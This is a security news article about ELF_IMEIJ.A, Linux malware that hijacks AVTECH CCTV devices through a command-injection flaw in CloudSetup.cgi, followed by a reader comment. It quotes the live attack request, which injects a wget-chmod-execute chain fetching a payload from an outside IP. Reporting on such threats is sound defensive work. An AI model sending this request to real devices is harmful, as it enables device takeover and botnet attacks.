New Linux malware hijacks one vendor's IoT devices by exploiting CGI bug

If only the vendor would fix the issue…

New Linux malware hijacks one vendor's IoT devices by exploiting CGI bug

A new form of Linux malware is hijacking Internet of Things (IoT) devices made by one vendor by exploiting a common gateway interface (CGI) vulnerability.

The ARM malware, detected by security software firm Trend Micro as "ELF_IMEIJ.A," arrives in requests for information (RFI) in CGI bin scripts. Upon delivery, the remote attacker sends the following request to random IP addresses:

POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http://192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1

Why, you might ask?

ELF_IMEIJ.A is looking to exploit an authenticated command injection vulnerability in devices made by AVTECH, a CCTV manufacturer, that specifically support CloudSetup.CGI.

Researchers at Search-Lab first discovered this vulnerability (along with several others) back in October 2015.

The problem is that there is not whitelist-based checking or verification for the exefile parameter of a CloudSetup.cgi, which specifies the system command to be executed. This bug therefore allows attackers to execute arbitrary commands with root privileges.

Trend Micro explains what ELF_IMEIJ.A can do once it's exploited the hole:

"The points of entry for this new Linux malware are connected AVTech devices such as IP cameras, CCTV equipment, and network recorders that support the AVTech cloud. Once the malware is installed onto the device, it gathers system information and network activity data. It can also execute shell commands from the malicious actor, initiate Distributed Denial of Service (DDoS) attacks, and terminate itself. Infected devices also put other devices connected to the same network at risk."

Linux malware 1

The infection flow of ELF_IMEIJ.A. (Source: Trend Micro)

Wait, distributed denial-of-service (DDoS) attacks? That sounds a lot like Mirai.

Well, it's different in that its exploit code is specific to AVTECH, it operates on port 39999, (Mirai works with three: 7547, 5555, and 48101.) and it specifically seeks out devices with unsecured cgi-bin scripts instead of bruteforcing products with BusyBox software installed. But as AVTECH has almost 130,000 devices connected to the web, the potential for ELF_IMEIJ.A to cause a mess is real.

Unfortunately, there's not much that can be done to patch these devices. Indeed, Search Lab reached out to AVTECH four times about the issue over the span of a year. When it never received a response, it disclosed the vulnerabilities publicly in October 2016.

Organizations can best protect their AVTECH products against ELF_IMEIJ.A by using security solutions that can monitor network protocols and Internet traffic for threats as well as proactively detect malware at the endpoint level.

Tags: , ,

Smashing Security audio podcast
Check out "Smashing Security", the new weekly audio podcast, with Graham Cluley, Carole Theriault, and special guests from the world of information security.

"Three people having fun in an industry often focused on bad news" • "It's brilliant!" • "The Top Gear of computer security"

Latest episode:

Subscribe to the free GCHQ newsletter

, ,

One Response

  1. Neil Anuskiewicz

    March 11, 2017 at 5:25 pm #

    Why do IoT devices need CGi support? Do they really deploy CGI scrips on these devices?

    Or is it a matter of not systematically disabling everything not needed to mitigate security risks? Or is there some other explanation?

Leave a Reply